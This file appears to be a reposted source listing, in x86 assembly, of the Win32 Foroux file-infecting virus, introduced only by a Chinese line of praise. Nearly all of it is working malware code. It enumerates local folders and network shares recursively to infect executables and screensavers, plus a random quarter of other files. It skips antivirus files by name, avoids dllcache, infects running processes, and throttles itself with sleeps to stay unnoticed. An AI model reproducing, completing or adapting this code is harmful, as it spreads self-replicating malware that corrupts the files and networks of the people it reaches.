elkern.c源代码 .txt

真的是非常非常的好！

;Sleep 20 minutes
push large 60
pop edi
main_thread_wait:
call goto_enum_proc
push large 20*1000
call [ebp+addrSleep-main_thread_ip]
dec edi
jnz short main_thread_wait

jmp short infect_all_driver

db 'Win32 Foroux V1.0'


;stack map
;esp->find file handle
;esp+4->WIN32_FIND_DATA
;esp+4+8*4+size WIN32_FIND_DATA->return address
;esp+4+8*4+size WIN32_FIND_DATA+4->find path
enum_path:
enum_path_ip equ main_thread_ip
pushad
lea esi,[esp+4+4*8]
call copy_path

call find_str_tail

if DEBUG
mov eax,'*.1\'
else
mov eax,'*.*\'
endif

stosd
xor eax,eax
stosd

sub esp,size WIN32_FIND_DATA
lea esi,[ebp+pathname_buf-enum_path_ip]
push esp
push esi
call [ebp+addrFindFirstFileA-enum_path_ip]
inc eax
jz enum_path_ok
dec eax
push eax ;handle of find file

found_one_file:
test dword ptr [esp+4+0],FILE_ATTRIBUTE_OFFLINE or FILE_ATTRIBUTE_REPARSE_POINT or FILE_ATTRIBUTE_SPARSE_FILE or FILE_ATTRIBUTE_TEMPORARY ;dwFileAttributes
jnz enum_next_file_jmp1

lea esi,[esp+4+size WIN32_FIND_DATA+4+4*8]
call copy_path
push edi
call find_str_tail
mov ecx,MAX_PATH
mov al,'\'
stosb
lea esi,[esp+4+4+2ch] ;cFileName
mov eax,[esi]
rep movsb
pop esi

;Check whether the file name is '.' or '..'
not eax
test eax,00002e2eh ;is '..'?
jz short enum_next_file_jmpz
test ax,002eh ;is '.'?
jz short enum_next_file_jmp1

test dword ptr [esp+4+0],FILE_ATTRIBUTE_DIRECTORY
jz short enum_do_fop

;Avoid go into Temporary Internet Files directory,
;because there are too many html files which can't be infected,we must save time
call enum_path_1
db 'rary Inter',0
enum_path_1:
pop edi
mov ebx,esi
push esi ;ESI must be protected because SUBCALL will destroy it.
SUBCALL str_instr,enum_path_ip
pop esi
jz short enum_next_file_jmpz
;Don't infect files in dllcache
push esi
SUBCALL is_in_dllcache,enum_path_ip
pop esi
enum_next_file_jmpz:
jz short enum_next_file

mov ecx,MAX_DIR_SIZE
sub esp,ecx
mov edi,esp
rep movsb
call enum_path ;recursion infect path
add esp,MAX_DIR_SIZE ;clear stack frame
enum_next_file_jmp1:
jmp short enum_next_file

enum_do_fop:

;Check AV file
not eax
call eax_to_lowcase
lea edi,[ebp+av_name-enum_path_ip]
push large av_name_num
pop ecx
repnz scasd
jz short enum_next_file_jmp1
and eax,00ffffffh
cmp eax,'0pva' and 00ffffffh ;avp
jz short enum_next_file_jmp1
cmp eax,'0van' and 00ffffffh ;nav
jz short enum_next_file_jmp1

mov edi,esi
;For quick and quiet infection,I'd better check the file extension
;But for infect widely,I have 1/4 chance to infect any file without check its extension.
call find_str_tail
mov eax,[edi-4]
call eax_to_lowcase
cmp eax,'exe.'
jz short enum_do_fop_1
cmp eax,'rcs.'
jz short enum_do_fop_1
test byte ptr [ebp+callsub_seed-enum_path_ip],3
enum_next_file_jmpnz:
jnz short enum_next_file

enum_do_fop_1:
mov edi,esi
SUBCALL file_operate,enum_path_ip

enum_next_file:
call have_a_sleep

lea eax,[esp+4] ;WIN32_FIND_DATA
mov ecx,[esp] ;find file handle
push eax
push ecx
call [ebp+addrFindNextFileA-enum_path_ip]
or eax,eax
jnz found_one_file

infect_one_path_close:
;Now esp->find file handle
call [ebp+addrFindClose-enum_path_ip]

enum_path_ok:
add esp,size WIN32_FIND_DATA ;clear stack frame
popad
retn
enum_path_end:

av_name equ this dword
dd 'pva_' ;_avp
dd 'rela' ;aler
dd 'noma' ;amon
dd 'itna' ;anti
dd '3don' ;nod3
dd 'sspn' ;npss
dd 'sern' ;nres
dd 'hcsn' ;nsch
dd 's23n' ;n32s
dd 'iwva' ;avwi
dd 'nacs' ;scan
dd 'ts-f' ;f-st
dd 'rp-f' ;f-pr
av_name_num equ ($-av_name)/4

enum_net:
enum_net_ip equ main_thread_ip
pushad
mov ebx,4*3+MAX_NETRESOURCE_NUM*8*4-4
mov ecx,1000h
probpage_loop:
sub ebx,ecx
jb short probpage_end
sub esp,ecx
push ecx
pop ecx
jmp short probpage_loop
probpage_end:
add ebx,ecx
sub esp,ebx

;Stack map
;esp->enumeration handle
;esp+4->number of entries=-1
;esp+8->buffer size=MAX_NETRESOURCE_NUM*8*4
;esp+0ch->buffer

push large 0
mov ecx,[ebp+addrWNetOpenEnumA-enum_net_ip]
jecxz enum_net_ret_jmp
push esp
push eax
push large RESOURCEUSAGE_ALL
push large RESOURCETYPE_DISK
push large RESOURCE_GLOBALNET
call ecx
or eax,eax
jnz short enum_net_ret_jmpnz

mov ecx,[ebp+addrWNetEnumResourceA-enum_net_ip]
enum_net_ret_jmp:
jecxz enum_net_ret_jmp2
mov esi,[esp] ;esi=enumeration handle
lea edi,[esp+8] ;edi->buffer size
mov dword ptr [edi],MAX_NETRESOURCE_NUM*8*4
push edi
lea edi,[esp+0ch+4] ;edi->buffer
push edi
lea edi,[esp+4+4*2] ;edi->number of entries
dec eax
mov dword ptr [edi],eax
push edi
push esi
call ecx
or eax,eax
enum_net_ret_jmpnz:
jnz short enum_net_ret
mov ecx,[edi]
enum_net_ret_jmp2:
jecxz enum_net_ret
enum_net_loop:
lea edx,[ecx*4]
test dword ptr [esp+edx*8+0ch-8*4+4*3],RESOURCEUSAGE_CONTAINER ;dwUsage is RESOURCEUSAGE_CONTAINER?
jz short not_container ;no

lea eax,[esp+edx*8-8*4+0ch]
call enum_net ;recurse infect the container
jmp short enum_net_loop_next

not_container:
mov esi,[esp+edx*8+0ch-8*4+4*5] ;esi=lpRemoteName
or esi,esi
jz short enum_net_loop_next

mov edi,esi
call find_str_tail
mov eax,[edi-2]
call eax_to_lowcase
and eax,00ffffffh
cmp eax,'00a\' and 0000ffffh ;is '\a'?If so,maybe floppy,don't infect it
jz short enum_net_loop_next
cmp eax,'00b\' and 0000ffffh ;is '\b'?If so,maybe floppy,don't infect it
jz short enum_net_loop_next

sub esp,MAX_DIR_SIZE
mov edi,esp

;OUTSTRING3 esi,enum_net_ip
enum_net_1:
lodsb
stosb
or al,al
jnz short enum_net_1 ;copy remote name
call enum_path
add esp,MAX_DIR_SIZE

enum_net_loop_next:
loop enum_net_loop

enum_net_ret:
;esp->enumeration handle
pop eax
mov ecx,[ebp+addrWNetCloseEnum-enum_net_ip]
jecxz enum_net_ret_1
or eax,eax
jz enum_net_ret_1
push eax
call ecx
enum_net_ret_1:
add esp,4*3+MAX_NETRESOURCE_NUM*8*4-4
popad
ret
enum_net_end:


goto_enum_proc:
pushad
pushfd
call goto_enum_proc_ip
goto_enum_proc_ip:
pop ebp
;Can't infect process too frequently,if so,some program will corrupt when they start.
call [ebp+addrGetTickCount-goto_enum_proc_ip]
mov ebx,12345678h
goto_enum_proc_pretime equ $-4
mov ecx,eax
sub ecx,ebx
cmp ecx,1000*60 ;Only more than every one minute to infect process
jc short goto_enum_proc_1
mov [ebp+goto_enum_proc_pretime-goto_enum_proc_ip],eax


SUBCALL enum_proc,goto_enum_proc_ip

goto_enum_proc_1:
popfd
popad
retn


have_a_sleep:
pushad
call have_a_sleep_ip
have_a_sleep_ip:
pop ebp

mov edi,[ebp+addrGetTickCount-have_a_sleep_ip]

call edi
mov ebx,12345678h
have_a_sleep_pretime equ $-4
sub eax,ebx

mov ebx,500 ;If isn't quick sleep,continue run for 500 millisecond
push large 50 ;Sleep for 50 seconds
pop esi

mov ecx,[ebp+quick_sleep-have_a_sleep_ip]
jecxz have_a_sleep_1 ;Not quick sleep

mov ebx,3000 ;If is quick sleep,continue run for 3000 millisecond
push large 20 ;Sleep for 20 seconds
pop esi

have_a_sleep_1:
cmp eax,ebx
jc short have_a_sleep_ret

shl esi,10
push esi
call [ebp+addrSleep-have_a_sleep_ip]

call edi
mov [ebp+have_a_sleep_pretime-have_a_sleep_ip],eax

call test_quick_sleep

call goto_enum_proc

have_a_sleep_ret:
popad
retn
have_a_sleep_end:


;in--ebp->have_a_sleep_ip
test_quick_sleep:
test_qs_ip equ have_a_sleep_ip
call test_qs_1
db MUTEX_NAME
test_qs_1:
pop edi
push edi
push large 0
push large FILE_MAP_WRITE
call [ebp+addrOpenFileMappingA-test_qs_ip]
or eax,eax
jz short test_qs_2
push eax
call [ebp+addrCloseHandle-test_qs_ip]
retn
test_qs_2:
inc eax
SUBCALL create_mem_map,test_qs_ip
jz short test_qs_3
mov [ebp+quick_sleep-test_qs_ip],eax
push eax
call [ebp+addrUnmapViewOfFile-test_qs_ip]
test_qs_3:
retn
test_quick_sleep_end:


copy_path:
;in--esi->path,ebp->enum_path_ip
;on return,edi->pathname_buf
mov ecx,MAX_DIR_SIZE
lea edi,[ebp+pathname_buf-enum_path_ip]
push edi
rep movsb
pop edi
ret

find_str_tail:
;edi->string,on return,edi->0
push eax
push ecx
xor eax,eax
mov ch,0ffh
repnz scasb
dec edi
pop ecx
pop eax
ret

eax_to_lowcase:
push ecx
push large 4
pop ecx
eax_to_lowcase_0:
cmp al,'A'
jc eax_to_lowcase_1
cmp al,'Z'
ja eax_to_lowcase_1
add al,'a'-'A'
eax_to_lowcase_1:
ror eax,8
loop eax_to_lowcase_0
pop ecx
retn

main_thread_end:


;in--ebx->string,edi->sub string to find
;out--ZF set means is in string,ZF cleared means not in
CALLHEADER str_instr
str_instr:
pushad
call str_instr_ip
str_instr_ip:
pop ebp
cld
mov al,38h
mov ebp,[ebp+addrlstrcmpiA-str_instr_ip]
or ebp,ebp
jz short str_instr_ret
dec ebx
str_instr_1:
inc ebx
call str_len
mov esi,ecx ;ebx=sub string len
xchg ebx,edi
call str_len ;ecx=source string len
xchg ebx,edi
push large 38h
pop eax
cmp esi,ecx
ja short str_instr_ret
mov dl,[ebx+esi]
push edx
push ebx
mov byte ptr [ebx+esi],0
push ebx
push edi
call ebp
or eax,eax
pop ebx
pop edx
mov [ebx+esi],dl
jnz short str_instr_1
str_instr_ret:
or eax,eax
popad
retn

;in--edi->string
;out--ecx=string length
str_len:
push edi
xor al,al
xor ecx,ecx
dec ecx
repnz scasb
pop edi
not ecx
dec ecx
retn
str_len_end:

str_instr_end:


;in--ebx->full path
;out--ZF set is in,ZF cleared,not in
CALLHEADER is_in_dllcache
is_in_dllcache:
pushad
call is_in_dllcache_ip
is_in_dllcache_ip:
pop ebp
call is_in_dllcache_1
db 'tem32\dllcac',0
is_in_dllcache_1:
pop edi
SUBCALL str_instr,is_in_dllcache_ip
popad
retn
is_in_dllcache_end:

;Out--edx=random
CALLHEADER get_rand
get_rand:
pushad
call get_rand_ip
get_rand_ip:
pop ebp
call [ebp+addrGetTickCount-get_rand_ip]
mov ecx,12345678h
rand_seed equ $-4
add eax,ecx
rol ecx,1
add ecx,esp
add [ebp+rand_seed-get_rand_ip],ecx
push large 32
pop ecx
get_rand_1:
shr eax,1
jnc get_rand_2
xor eax,HASH16FACTOR
get_rand_2:
loop get_rand_1
mov [esp+5*4],eax
mov [ebp+callsub_seed-get_rand_ip],ax

popad
retn
get_rand_end:


CALLHEADER get_extra_proc
get_extra_proc:
pushad

call get_extra_proc_ip
get_extra_proc_ip:
pop ebp
lea edi,[ebp+sfc_hash_table-8-get_extra_proc_ip]
push large 1
get_extra_proc_0:
push edi
call [ebp+addrLoadLibraryA-get_extra_proc_ip]
or eax,eax
jz short get_extra_proc_1
mov ebx,eax
sub ebx,10000h
SUBCALL search_api_addr,get_extra_proc_ip
get_extra_proc_1:
pop ecx
jecxz get_extra_proc_2
dec ecx
push ecx
lea edi,[ebp+mpr_hash_table-8-get_extra_proc_ip]
jmp short get_extra_proc_0
get_extra_proc_2:

call get_extra_proc_3
db 'user32',0
get_extra_proc_3:
call [ebp+addrLoadLibraryA-get_extra_proc_ip]
or eax,eax
jz short get_extra_proc_4
mov ebx,eax
sub ebx,10000h
lea edi,[ebp+user32_hash_table-8-get_extra_proc_ip]
SUBCALL search_api_addr,get_extra_proc_ip
get_extra_proc_4:

popad
retn
get_extra_proc_end:
;*******************************mainthrd.asm end*****************************

;code and initialized data end here
vir_size equ $-_start

;Uninitialized data
ftime db 3*8 dup(0)
is9x dd 0
quick_sleep dd 0
infbuffer db vir_size+10 dup(0)
pathname_buf db MAX_DIR_SIZE*2+100 dup(0)
vbuffer db INFPROC_MAP_SIZE+100 dup(0)
snapbuf db 300 dup(0)

if DEBUG
hexstr db 16 dup(0)
endif

vir_mem_size equ $-_start

host:
mov eax,0

mov eax,vir_first_blk_size
mov ebx,vir_mem_size
mov ebp,offset _start_ip

SUBCALL prepare_buffer,_start_ip

lea edi,dummyfile
SUBCALL file_operate,_start_ip

jmp over
push large 0fffdb43dh
push large 0
push large 0fffh
call [ebp+addrOpenProcess-_start_ip]
push eax
xchg eax,edi

mov ebx,400000h
SUBCALL inf_proc,_start_ip

call [ebp+addrCloseHandle-_start_ip]

over:
push large 0
push offset cap
call nxt
if DEBUG
db 'Game over',0
else
db 'Released!!!',0
endif
nxt:
push large 0
call MessageBoxA

push large 0
call ExitProcess

end _start